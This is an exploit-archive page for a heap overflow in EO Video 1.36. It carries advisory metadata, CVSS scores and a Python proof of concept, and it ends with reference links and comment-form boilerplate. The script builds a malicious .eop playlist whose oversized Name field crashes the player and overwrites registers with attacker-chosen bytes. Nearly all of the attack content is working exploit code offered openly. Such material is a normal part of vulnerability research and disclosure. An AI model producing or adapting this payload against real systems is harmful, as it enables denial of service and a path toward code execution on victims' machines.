EO Video 1.36 Local Heap Overflow DOS / PoC

2008.08.22
Credit: j0rgan
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/python # -------------------------------------------------------------- # EO Video v1.36 Heap Overflow local PoC/DoS exploit # *.eop playlist file in <Name> buffer overflow # Other versions may be vulnerable too... # -------------------------------------------------------------- # Vulnerability discovered and coded by Muris Kurgas aka j0rgan # jorganwd [at] gmail [dot] com # -------------------------------------------------------------- # # Who uses this crap of player anyway? :) # -------------------------------------------------------------- # EAX 42424242 # EDX 42424242 # -------------------------------------------------------------- import os bafer = '\x41'* 700 + '\x42' * 4 print "Spit me out, all bright and shiny! :)" fileHandle = open ( 'plejlista.eop', 'w' ) fileHandle.write ('<EOPlaylist>\n<Playlist>\n<FolderList>\n<Folder>\n<Name>nesto</Name>\n<TrueFrequency>1</TrueFrequency>\n ') fileHandle.write ('</Folder>\n<Folder>\n<Name>nesto</Name>\n<TrueFrequency>1</TrueFrequency>\n</Folder>\n</FolderList>\n<ProjectElement>\n ') fileHandle.write ('<Name>'+bafer+'</Name>') fileHandle.write ('<StartTime>0</StartTime>\n<EndTime>0</EndTime>\n<MediaSize>\n<Width>-1</Width>\n<Height>-1</Height>\n</MediaSize>\n ') fileHandle.write ('<State>30216</State>\n<FolderPositionIndex>0</FolderPositionIndex>\n ') fileHandle.write ('</ProjectElement>\n</Playlist>\n</EOPlaylist>\n') fileHandle.close ()

References:

http://xforce.iss.net/xforce/xfdb/44508
http://www.securityfocus.com/bid/30717
http://www.milw0rm.com/exploits/6253
http://secunia.com/advisories/31511


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top